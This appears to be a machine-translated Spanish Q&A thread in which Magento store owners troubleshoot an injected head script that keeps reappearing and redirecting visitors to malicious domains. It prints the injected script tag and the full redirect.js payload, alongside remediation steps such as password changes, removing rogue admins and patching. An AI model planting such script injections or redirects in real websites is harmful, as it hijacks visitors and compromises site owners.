El sitio web comienza a redirigir a otra url


9

Maybe it's infected by some virus.

Mi sitio web comienza a redirigir a estas URL infectadas.

http://mon.setsu.xyz
y alguna vez https://tiphainemollard.us/index/?1371499155545
Enlaces infectados

Lo que hice para resolver.

  1. Archivo .htaccess comentado (no pasa nada)
  2. Carpeta de inclusión comentada (no pasa nada)
  3. Servidor completo escaneado (no ocurre nada, no se encontró ningún virus malicioso)
  4. Se modificó la ruta CSS, medios y js de la base de datos solo para garantizar que el clima de PHP o cualquier js esté haciendo (no pasa nada)
  5. select * from core_config_data where path like '%secure%';todos los enlaces están bien ACTUALIZAR

Busqué en Google y se escribieron muchos artículos sobre esto, pero sugieren que fue un problema del navegador o que mi sistema está infectado. Un artículo sobre esto, incluso si abro el sitio en mi teléfono o en mi computadora portátil personal, los problemas son los mismos.

ACTUALIZACIÓN 2

Encontré la fila en la base de datos que se ve afectada. (como también dice Boris K.)

En el valor de la core_config_data tabla design/head/includestenemos un

<script src="<a href="https://melissatgmt.us/redirect_base/redirect.js">https://melissatgmt.us/redirect_base/redirect.js</a>" id="1371499155545"></script>  

Que se insertará en la sección del encabezado en la carga de la página.

Si visita la URL anterior, obtendrá un script de redireccionamiento que es

   var redirChrome;
var isToChrome = document.currentScript.getAttribute('data-type');

if((isToChrome == 1 && navigator.userAgent.indexOf("Chrome") != -1) || !isToChrome){

 var idToRedirect = document.currentScript.getAttribute('id'); 

window.location.replace('https://tiphainemollard.us/index/?'+idToRedirect);
}

El sitio web del cliente funciona desde la tarde una vez que eliminé ese script. But the main problem is how that script inserted into the database.

Un parche también está desactualizado, así que también actualicé ese parche.

ACTUALIZACIÓN 3 El sitio se infecta nuevamente. Este es el script insertado en la sección Admin ( Admin-> Configuration-> General-> Design-> HTML Head-> Miscellaneous Script ) administración

Y en la columna de la base de datos base de datos

No sé que hacer ahora. Como cambié cada contraseña, eliminé todos los usuarios antiguos.

ACTUALIZACIÓN 3

Hasta ahora, ese error no aparece, por lo que significa que, siguiendo los pasos anteriores, podemos superar este problema.

ACTUALIZACIÓN :: 4 Siempre instale parches, ya que me ayuda en los proyectos para que la tienda sea menos propensa a este tipo de problemas y los parches también son importantes. Uno puede usar https://magescan.com/ para verificar los problemas en su sitio web.


en su sistema puede verse afectado por favor verifíquelo. revisa tu navegador.
Rama Chandran M

@RamaChandran cuando busco en Google sobre esta url casi todas las sugerencias de que era un problema del navegador. Abrí el sitio en mi teléfono también mismo problema.
inrsaurabh

Proporcione la URL de su sitio web
Rama Chandran M

1
He eliminado <script src = "<a href =" melissatgmt.us/redirect_base/redirect.js">https://... >" id = "1371499155545"> </ script> desde el diseño / cabeza / incluye. Todavía no funcionó. Y después de visitar mi sitio web, ese código javascrip aparece nuevamente. ¿Tienes alguna idea? La dirección del sitio web es hdvideodepot.com
Mark

1
¿Puedes agregar una etiqueta de versión de magento?
sv3n

Respuestas:


6

Encontré el código inyectado en la core_config_datatabla, debajo design/head/includes. Lo eliminó y ahora el sitio vuelve a la normalidad.

ACTUALIZACIÓN: Como todos los demás mencionaron, sucedió nuevamente esta mañana. Esta vez lo eliminé más fácilmente desde el Panel de administración debajo System > Configuration > General > Design > HTML Head > Miscellaneous Scripts. Esta es una gran vulnerabilidad, espero que Magento esté trabajando en un parche.

ACTUALIZACIÓN 2: El script regresó nuevamente, así que cambié la contraseña de db, borré el caché. Aproximadamente una hora después, el guión ha vuelto. Así que no creo que se agregue a través de la base de datos. Acabo de cambiar mi contraseña de administrador, veamos si vuelve a aparecer.

ACTUALIZACIÓN 3: desde que cambié la contraseña de administrador ayer en mis dos sitios afectados, aproximadamente 24 horas después, ambos todavía están limpios.


2
wow, esta es una gran violación de seguridad, ¿alguna idea de qué tipo de vulnerabilidad lo causó?
Yehia A.Salam

3
Debe ser un agujero en las versiones anteriores de Magento. Tengo un sitio construido en Magento 2.1 que no se vio afectado, pero todos los sitios por debajo de la versión 2 se redirigen.
Boris K.

Este es un gran problema de seguridad. ¿Alguien sabe cómo se inyectó el código en la tabla? Esa tabla es donde, desde el área de administración, podemos agregar estilos y javascript al pie de página / encabezado del sitio web. ¿Cómo podría un hacker comprometer eso? ¿Significa que tenían acceso al administrador?
Peanuts

sigue regresando después de eliminarlo, no estoy seguro de qué hacer
Yehia A.Salam

Detecté usuarios maliciosos en Sistema> Permisos> Usuarios. Después de eliminarlos (y arreglar previamente la tabla core_config_data y cambiar la contraseña del administrador), parece estable, pero me gustaría saber cómo sucedió eso en primer lugar. El agujero / puerta trasera todavía puede estar allí y es un misterio.
Maní

3

Mismo problema en otro sitio de magento. Descubrí que se inyecta un script en la sección HEAD de la página, solicitando redirect_base / redirect.js de melissatgmt.us (luego cambiado a otro dominio) pero no puedo entender cómo se inyecta esta mierda.

ACTUALIZACIÓN : Según lo mencionado por otros, encontró la entrada en la tabla core_config_data y la eliminó, pero el registro volvió a la página siguiente. Cambié la contraseña de db y ahora parece ser derrotada. No estoy seguro de que el cambio de contraseña sea la solución definitiva, pero de todos modos es una mejora de seguridad.

ACTUALIZACIÓN 2 : Como lo indicó Jix Sas, acceder desde la configuración en la administración de magento es una solución más fácil que acceder directamente a la tabla de la base de datos. Pero la mierda sigue volviendo cada 10/15 minutos.

ACTUALIZACIÓN 3 : Se modificó la contraseña de administrador, se verificaron y se guardaron algunas páginas de cms (servicio al cliente y sobre nosotros) que parecían estar infectadas de alguna manera, se deshabilitó el caché, se limpió el caché varias veces (después de cada verificación y guardado de la página de cms 'infectado') más script inyectado durante las últimas 8 horas.


Sí, tienes razón, obtuve la fila que está afectada.
inrsaurabh

Tenga en cuenta que el administrador de magento es accesible sin problemas y en el registro web puedo ver que los accesos de bot no se ven afectados. Creo que el malware se limita a la interfaz y comprueba el agente de usuario del navegador.
ConsuLanza Informatica

¿Sabías de dónde fue inyectado?
Yehia A.Salam

sí, puedo confirmar que sigue volviendo cada 10/15 minutos, incluso después de eliminar la entrada de la base de datos
Yehia A.Salam

2

Cambié la ruta al panel de administración app/etc/local.xmly ayuda. El script ya no se agrega a design/head/includes.

Explicación

En el app/etc/local.xmlque cambié <admin> <routers> <adminhtml> <args> <frontName><![CDATA[new_admin_path]]></frontName> </args> </adminhtml> </routers> </admin>anteriormente, era sitedomain.com/admin, y ahora la ruta al panel de administración será sitedomain.com/new_admin_path


Lo siento, no tuve lo que u hizo, la amabilidad de explicarwhich path u chagned
inrsaurabh

En la aplicación / etc / local.xml cambié <admin> <routers> <adminhtml> <args> <frontName><![CDATA[new_admin_path]]></frontName> </args> </adminhtml> </routers> </admin>Anteriormente era sitedomain.com/admin, y ahora la ruta al panel de administración será sitedomain.com/new_admin_path
Eugenia

Ok
entiendo

1

Este es un gran alivio, he restaurado mi sitio 10 veces desde la mañana.

El error sigue viniendo una y otra vez.

¿Cuál es la solución definitiva?

¿Cambiar contraseña de DB? ¿Cambiar contraseña de root? ¿Se ha lanzado algún parche?

No estoy seguro de si esto está relacionado. Recibí el siguiente correo electrónico de una consultoría de seguridad.

Estimado señor o señora,

Somos Hatimeria, una empresa de desarrollo de Magento con sede en Suiza, Polonia y los Países Bajos.

Recientemente, comenzamos a trabajar con un nuevo cliente y asumimos su antiguo servidor. En el momento en que accedimos al servidor, nos topamos con algún malware, con el cual los piratas informáticos pudieron hacerse cargo del servidor del cliente y usarlo como una "máquina de piratas informáticos" para hackear otros sitios web. Por supuesto, el cliente no sabía que esto estaba sucediendo en su servidor.

Encontramos credenciales de la base de datos de su sitio web que fue pirateado a través de ese servidor. Por supuesto, no haremos nada al respecto, pero me siento obligado a contactarlo y hacerle saber lo que está sucediendo. El pirateo se realizó a través de la vulnerabilidad Magento Cacheleak, que aún podría estar presente en su tienda en este momento.

Le aconsejo que se ocupe inmediatamente de esa vulnerabilidad y que cambie la contraseña de su base de datos. Nuestros técnicos dicen que esto debería tomar unos 30 minutos.

En el sitio web MageReport puede ver a qué más podría ser vulnerable su sitio web: https://www.magereport.com/scan/?s=

Mi intención principal de este correo electrónico no es hacer una adquisición de clientes, pero si necesita ayuda para asegurar su tienda o si tiene alguna otra pregunta, estaremos encantados de ayudarlo.

Con un cordial saludo, Thomas Tanner

Entonces, supongo que la solución es cambiar la contraseña de la base de datos


1

Necesitamos entender cuál es la causa PRINCIPAL de tales inyecciones de spam

Si su sitio fue inyectado, verifique su sitio en TODOS LOS TRES escaneos de malware

https://magescan.com

https://www.magereport.com

https://sitecheck.sucuri.net/

Tengo la sensación de que esto se debe a la falta de parche de seguridad. Si ve que falta un parche, INFORME BAJO ESTE TEMA .

  1. Cambiar la contraseña de acceso de Hosting Cambiar la contraseña de la base de datos Cambiar las contraseñas de inicio de sesión de administrador OCULTAR ADMINISTRACIÓN Y DESCARGAR URL y ocultar / RSS / de la vista pública.

  2. Haga un escaneo completo del virus del sitio, su proveedor de alojamiento puede escanear el sitio si no puede hacerlo usted mismo.

  3. Vaya a Sysytem -> Users y vea si hay usuarios registrados NO AUTORIZADOS en la cuenta.


0

Solucioné el problema. Incluso después de que eliminé este archivo <script src="https://melissatgmt.us/redirect_base/redirect.js" id="1371499155545"></script>de la core_config_datatabla en design/head/includesvalor. No resolvió el problema. el código del script se insertó una y otra vez. Para solucionar el problema, simplemente siga estos tres pasos.

  1. Elimine el código del script de la core_config_datatabla en design/head/includes.
  2. Cambie la contraseña de la base de datos, incluida la app/etc/local.xmlcredencial.
  3. Borrar caché en la carpeta raíz de Magento con este comando rm -rf var/cache/*

PD: Pasé todo el día. Se espera que esto funcione para usted. Y asegúrese de hacer una copia de seguridad del archivo todo el tiempo.


0

¡exactamente lo mismo me sucedió hoy! redirigiendo al mismo sitio web. sin embargo, encontré el script en el panel de administración de Magento en configuración> diseño> html head> misc scripts. existía este script: lo <script src="https://melissatgmt.us/redirect_base/redirect.js" id="1371499155545"></script> eliminé de allí y el sitio web funciona bien. no tengo la carpeta donde dijo que encontró el script. ¿Alguna idea de dónde podría estar? (ya que conoce la ruta al encabezado HTML> scripts misceláneos)

Además, ¿qué hiciste recientemente? tal vez podamos descubrir la causa? Para mí, instalé una ventana emergente de boletín gratuito que puede ser la causa. ¿que pasa contigo?

ACTUALIZACIÓN: bueno, ahora el guión ha vuelto. Alguien me dice cómo puedo acceder a este script desde la base de datos para eliminarlo, por favor.

ACTUALIZACIÓN 2: como lo indicó Mark, eliminar el script Y cambiar la contraseña de la base de datos impidió que este script volviera. Si alguien conoce el nombre de esta vulnerabilidad, o si existe un peligro para el pago de los clientes, háganoslo saber.

Al usar nuestro sitio, usted reconoce que ha leído y comprende nuestra Política de Cookies y Política de Privacidad.
Licensed under cc by-sa 3.0 with attribution required.